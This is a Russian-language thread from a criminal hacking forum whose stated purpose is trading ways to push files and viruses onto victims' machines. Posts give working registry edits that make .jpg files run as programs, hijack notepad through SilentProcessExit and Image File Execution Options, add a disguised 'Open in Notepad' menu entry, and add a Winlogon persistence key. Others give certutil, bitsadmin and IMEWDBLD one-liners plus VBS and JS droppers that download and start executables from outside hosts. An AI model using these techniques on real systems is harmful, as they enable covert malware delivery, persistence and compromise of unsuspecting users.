• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга Идеи впаривания файлов (вирусов)

Перейти к новому Отслеживать
xrahitel

xrahitel

(L1) cache
Пользователь
Регистрация
29.04.2014
Сообщения
847
Реакции
1 368
Всем п/т в данный топ создан с целью обсуждения идей впаривания файлов (вирусов) как массово так и точечно.

Тут будут интересные фичи,баги,#lolbin и.т.д видео мультики
biggrin.png


Думаю с вышеизложенным мы разобрались, рано или поздно у новичков возникает данный вопрос про (Silent Exploit JPG) есть такое или нет, однозначно нет. Чтобы проделать данный фокус видео демонстрации, нужно подкрутить реестр так тыц.

Код: 
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.jpg ]
@="exefile"
"Content Type"="application/x-msdownload"

[HKEY_CLASSES_ROOT\.jpg \PersistentHandler]
@="{098f2470-bae0-11cd-b579-08002b30bfeb}"

Вариант второй тыц, есть и ещё способы о которых расскажу позже в данном топе, но чтоб Вы понимали данные способы не лишены смысла, это так скажем не плохой способ закрепиться на тачке жертвы
wink.png


p.s Большая просьба ко Всем, не стоит тут флудить и устраивать срач, не надо тут писать сообщения типо (помоги,перезалейте,спасибо,) для всех вопросов есть личка.Ещё раз, сообщение должно нести смысловую нагрузку.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
вообще идея хорошая это я про второй метод
Я думаю что таким методом можно сделать загрузку и запуску файла например через certutil
 
blackteam007 сказал(а):
вообще идея хорошая это я про второй метод
Я думаю что таким методом можно сделать загрузку и запуску файла например через certutil


p.s Тут два варианта как на открытие так и закрытие тыц по русски тыц, тут есть тема как через отладчик подцепить процесс к блокноту тыц будет сразу открывать вашу нагрузку но мне не понравился такой вариант.Вот мой вариант тут не нужно чтоб Ваш нагрузка была у жертвы на компе, но работает как то криво и не всегда, надо докручивать все это дело как говориться, сам подтягивал автолитом через скомпилированный файл и.т.д
Код: 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\Windows\\System32\\cmd.exe /c certutil  -VerifyCTL -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start Blob0_0.bin"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200
 
Пожалуйста, обратите внимание, что пользователь заблокирован
xrahitel сказал(а):

p.s Тут два варианта как на открытие так и закрытие тыц по русски тыц, тут есть тема как через отладчик подцепить процесс к блокноту тыц будет сразу открывать вашу нагрузку но мне не понравился такой вариант.Вот мой вариант тут не нужно чтоб Ваш нагрузка была у жертвы на компе, но работает как то криво и не всегда, надо докручивать все это дело как говориться, сам подтягивал автолитом через скомпилированный файл и.т.д
Код: 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe]
"ReportingMode"=dword:00000001
"MonitorProcess"="C:\\Windows\\System32\\cmd.exe /c certutil  -VerifyCTL -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start Blob0_0.bin"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000200
Код: 
certutil  -VerifyCTL -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start Blob0_0.bin"

эта строка на моем пк вообще не запускает путти таким способом

а вот так работает - certutil  -urlcache -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start putty.exe
 
blackteam007 сказал(а):
Код: 
certutil  -VerifyCTL -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start Blob0_0.bin"

эта строка на моем пк вообще не запускает путти таким способом

а вот так работает - certutil  -urlcache -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start putty.exe
Не знаю по чему там у тебя не работает но это один х.... тупо пример, команды свои можите тестить на любой вкус как говориться
1626340917892.png
 
Так можно сделать с js,html,xml но и с .hta данная фича Майками неисправленная до сих пор. Вот в чем тут фича что нам не нужен софт, надо просто сделать два расширения так test.chm.chm
wink.png


 
xrahitel сказал(а):
Так можно сделать с js,html,xml но и с .hta данная фича Майками неисправленная до сих пор. Вот в чем тут фича что нам не нужен софт, надо просто сделать два расширения так test.chm.chm
wink.png


File = oShell.ExpandEnvironmentStrings("%TEMP%") & "\payload.exe" is another way or Environ("TEMP") to get relative paths
wink.png
 
Продолжение этого топа тыц бага так и работает
1626358262823.png


Вот .vbs
Код: 
WScript.CreateObject("WScript.Shell").Run "cmd /c bitsadmin /transfer Explorers /download /priority FOREGROUND https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe %temp%\putty.exe & start %temp%\putty.exe",0,true
Ну и .js
Код: 
var r = new ActiveXObject("WScript.Shell").Run("cmd /c certutil  -VerifyCTL -f -split  https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe & start Blob0_0.bin",0,true );

Варики тыц для теста тыц да выше коды детектится уже понятное дело.
 
Последнее редактирование:
Пока видео демонстрация https://xss.pro/proxy.php?image=https%3A%2F%2Falligator.cash%2F%2Fpublic%2Fstyle_emoticons%2Fdefault%2Fwink.png&hash=d40164a2671b9a197aa5700222f71979

 

p.s Понятно что команды свои ставим Reg v1.2 и тыц да если хотите cmd чтоб иконки были и.т.д то Вам понадобится этот софт тыц там выставляете в каком меню хотите чтоб у жертвы были ваши закладки и все, потом экспорт ключа реестра и в бой
wink.png


Код: 
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\xrahitel]
"MUIVerb"="Открыть в Блокноте"
"Icon"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
  00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6e,00,\
  6f,00,74,00,65,00,70,00,61,00,64,00,2e,00,65,00,78,00,65,00,00,00

[HKEY_CLASSES_ROOT\*\shell\xrahitel\command]
@="C:\\WINDOWS\\system32\\calc.exe"

[HKEY_CLASSES_ROOT\Directory\Background\shell\console2]
"MUIVerb"="Открыть в Блокноте"
"Icon"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,\
  00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,6e,00,\
  6f,00,74,00,65,00,70,00,61,00,64,00,2e,00,65,00,78,00,65,00,00,00


[HKEY_CLASSES_ROOT\Directory\Background\shell\console2\command]
@="c:\\windows\\system32\\calc.exe"
 
Пожалуйста, обратите внимание, что пользователь заблокирован
xrahitel сказал(а):
Пока видео демонстрация
wink.png



это все было бы супер если бы небыло видно что этот файл ссылка тогда этим методам вообще цены бы не было
 
 
Последнее редактирование модератором:
Это работает с .au3 .hta .txt .rar .csv .html.xll тема тут тыц
wink.png



 

p.s converter тему тут найдете тыц
wink.png

Код: 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/Vupfdp/test.exe %APPDATA%\test.exe & start %APPDATA%\test.exe"
 
xrahitel сказал(а):

p.s converter тему тут найдете тыц
wink.png

Код: 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/Vupfdp/test.exe %APPDATA%\test.exe & start %APPDATA%\test.exe"
wtf?

Screenshot

Captured with Lightshot
prnt.sc
и так с каждым твоим постом, итак каптч по работе хватает, еще тут на форуме сидеть разгадывать :)))
 
xrahitel сказал(а):

p.s converter тему тут найдете тыц
wink.png

Код: 
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\Windows\\system32\\userinit.exe,C:\\Windows\\System32\\cmd.exe /c certutil -urlcache -split -f http://disk.karelia.pro/Vupfdp/test.exe %APPDATA%\test.exe & start %APPDATA%\test.exe"
[/QUOTE]
Интересная реализация с времён появляения винлокера щас вымогателей! НО! ты бы не забыл что запись туда только под правами админа и опять же нахрена ты стёр сплорера. Мда...
 

Новости тыц для теста тыц



Тема 2017 тыц софт и собранные .PDF найдете тыц

2021-05-28-125326.gif


Видео у меня нет алерта так как был источник добавлен в доверенный но это не отменяет самой баги и.т.д зверьков можно подтянуть и через SMB/WebDAV это также может работать и на любом другом софте что работает .PDF
wink.png



 
Последнее редактирование:
Fargo сказал(а):
и так с каждым твоим постом, итак каптч по работе хватает, еще тут на форуме сидеть разгадывать :)))
Не знаю у меня все нормально, это к Админу или к торы вопросы
smile.png


wav сказал(а):
НО! ты бы не забыл что запись туда только под правами админа
Нет не забыл, но если мне семью классами образования это понятно, тогда х... знает кому что тут объяснять, элементарные вещи, пусть мимо проходят как говориться, да там ссылка на статью есть да сильно упоротых, вроде все расписано
wink.png
 
Последнее редактирование:
Не много #lolbin
wink.png



p.s Тема тут тыц офис 2019


Тема тыц и тыц

Код: 
C:\Windows\System32\IME\SHARED\IMEWDBLD.exe http://alligator.cash/xxx.exe

@echo off
 
for /f %%a in ('where /r "C:\Users\administrator\AppData\Local\Microsoft\Windows\INetCache\IE" xxx[1].exe') do (
start "" "%%a"
)


Читаем, вникаем тыц и тыц
wink.png

 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх